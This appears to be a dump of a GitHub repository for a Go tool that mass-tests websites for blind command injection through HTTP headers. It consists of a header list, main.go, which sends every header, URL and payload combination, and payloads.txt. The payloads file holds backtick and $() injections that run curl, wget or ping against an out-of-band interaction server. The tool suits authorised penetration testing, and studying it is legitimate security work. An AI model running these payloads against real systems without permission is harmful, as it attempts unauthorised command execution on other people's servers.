X-Up-Devcap-Screendepth 1085 | X-Up-Devcap-Screenpixels 1086 | X-Up-Subno 1087 | X-Update 1088 | X-Update-Range 1089 | X-Upload-Maxresolution 1090 | X-Upload-Name 1091 | X-Upload-Size 1092 | X-Upload-Type 1093 | X-Url-Scheme 1094 | X-User 1095 | X-User-Agent 1096 | X-Username 1097 | X-Varnish 1098 | X-Verify-Credentials-Authorization 1099 | X-Vodafone-3gpdpcontext 1100 | X-Wap-Client-Sdu-Size 1101 | X-Wap-Clientid 1102 | X-Wap-Gateway 1103 | X-Wap-Network-Client-Ip 1104 | X-Wap-Network-Client-Msisdn 1105 | X-Wap-Profile 1106 | X-Wap-Proxy-Cookie 1107 | X-Wap-Session-Id 1108 | X-Wap-Tod 1109 | X-Wap-Tod-Coded 1110 | X-Whatever 1111 | X-Wikimedia-Debug 1112 | X-Wp-Nonce 1113 | X-Wp-Pjax-Prefetch 1114 | X-Ws-Api-Key 1115 | X-Xc-Schema-Version 1116 | X-Xhprof-Debug 1117 | X-Xhr-Referer 1118 | X-Xmlhttprequest 1119 | X-Xpid 1120 | X-Zikula-Ajax-Token 1121 | X-Zotero-Version 1122 | X-Ztgo-Bearerinfo 1123 | X_alto_ajax_key 1124 | Xauthorization 1125 | Xonnection 1126 | Xpdb-Debugger 1127 | Xproxy 1128 | Xroxy-Connection 1129 | Xxx-Real-Ip 1130 | Xxxxxxxxxxxxxxx 1131 | Y 1132 | Zotero-Api-Version 1133 | Zotero-Write-Token 1134 | Accept-Patch 1135 | Alt-Svc 1136 | Delta-Base 1137 | ETag 1138 | IM 1139 | P3P 1140 | WWW-Authenticate 1141 | X-Frame-Options 1142 | X-HTTP-Method-Override 1143 | x-wap-profile 1144 | Accept-CH 1145 | Accept-CH-Lifetime 1146 | Clear-Site-Data 1147 | Cross-Origin-Resource-Policy 1148 | DPR 1149 | Device-Memory 1150 | Early-Data 1151 | Expect-CT 1152 | Feature-Policy 1153 | Sec-Fetch-Dest 1154 | Sec-Fetch-Mode 1155 | Sec-Fetch-Site 1156 | Sec-Fetch-User 1157 | Sec-WebSocket-Accept 1158 | Server-Timing 1159 | SourceMap 1160 | Want-Digest 1161 | X-DNS-Prefetch-Control 1162 | X-ProxyUser-Ip 1163 | X-XSS-Protection 1164 | Public-Key-Pins 1165 | Public-Key-Pins-Report-Only 1166 | Sec-Fetch-Site 1167 | Sec-Fetch-Mode 1168 | Sec-Fetch-User 1169 | Sec-Fetch-Dest 1170 | Last-Event-ID 1171 | Ping-From 1172 | NEL 1173 | Sec-WebSocket-Key 1174 | Sec-WebSocket-Extensions 1175 | Sec-WebSocket-Accept 1176 | Sec-WebSocket-Protocol 1177 | Sec-WebSocket-Version 1178 | Accept-Push-Policy 1179 | Accept-Signature 1180 | Alt-Svc 1181 | Date 1182 | Signed-Headers 1183 | Server-Timing 1184 | Service-Worker-Allowed 1185 | SourceMap -------------------------------------------------------------------------------- /headers_common.txt: -------------------------------------------------------------------------------- 1 | User-Agent 2 | Accept -------------------------------------------------------------------------------- /image/insprired.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tranquac/cmd-inject-header/c6709dd01918322128bda53b3905d2273ad06a38/image/insprired.png -------------------------------------------------------------------------------- /image/run.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tranquac/cmd-inject-header/c6709dd01918322128bda53b3905d2273ad06a38/image/run.png -------------------------------------------------------------------------------- /main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "cmd-inject-header/core" 5 | "flag" 6 | "fmt" 7 | "os" 8 | "strings" 9 | "time" 10 | ) 11 | 12 | func main() { 13 | flagCheck := flag.NewFlagSet("cmd-inject-header", flag.ExitOnError) 14 | hdName := flagCheck.String("hd", "", "Path to list header file") 15 | urName := flagCheck.String("ur", "", "Path to list url file (URL have / in the end: http://example.com/)") 16 | plName := flagCheck.String("pl", "", "Path to list payload file") 17 | itServer := flagCheck.String("it", "", "Your interact server to check the interaction (dnslog.cn/burp collabarator/interact.sh...)") 18 | stterror := flagCheck.Bool("se", false, "If you want send request for status code 4xx/5xx") 19 | flagCheck.Parse(os.Args[1:]) 20 | if *hdName == "" || *plName == "" || *urName == "" || *itServer == "" { 21 | fmt.Println("Usage : go run . -hd headers_common.txt -pl payloads.txt -ur urls.txt -it xxx.burpcollaborator.net") 22 | fmt.Println("Usage : go run . -hd headers_common.txt -pl payloads.txt -ur urls.txt -it xxx.burpcollaborator.net -se=true") 23 | fmt.Print("(To send request for status code 4xx/5xx. Sometime app only vuln with this status code!)") 24 | } else { 25 | start := time.Now() 26 | urls := core.ReadFromFile(*urName) 27 | headers := core.ReadFromFile(*hdName) 28 | _payloads := core.ReadFromFile(*plName) 29 | var payloads []string 30 | for _, payload := range _payloads { 31 | payload := strings.Replace(payload, "INTERACT_SERVER", *itServer, -1) 32 | payloads = append(payloads, payload) 33 | } 34 | total := len(payloads)*len(headers) * len(urls) 35 | fmt.Println("Total request will send: ", total) 36 | ch := make(chan string) 37 | for _, url := range urls { 38 | if *stterror { 39 | go core.MakeRequestHeader(url + "toMakeError", headers, payloads, ch) 40 | } else { 41 | go core.MakeRequestHeader(url, headers, payloads, ch) 42 | } 43 | } 44 | for range urls { 45 | fmt.Println(<-ch) 46 | } 47 | fmt.Printf("%.2fs elapsed\n", time.Since(start).Seconds()) 48 | } 49 | } 50 | -------------------------------------------------------------------------------- /payloads.txt: -------------------------------------------------------------------------------- 1 | `curl -v INTERACT_SERVER` 2 | $(curl -v INTERACT_SERVER) 3 | `wget INTERACT_SERVER` 4 | $(wget INTERACT_SERVER) 5 | `ping INTERACT_SERVER` 6 | $(ping INTERACT_SERVER) -------------------------------------------------------------------------------- /urls.txt: -------------------------------------------------------------------------------- 1 | https://tranquac.com/ --------------------------------------------------------------------------------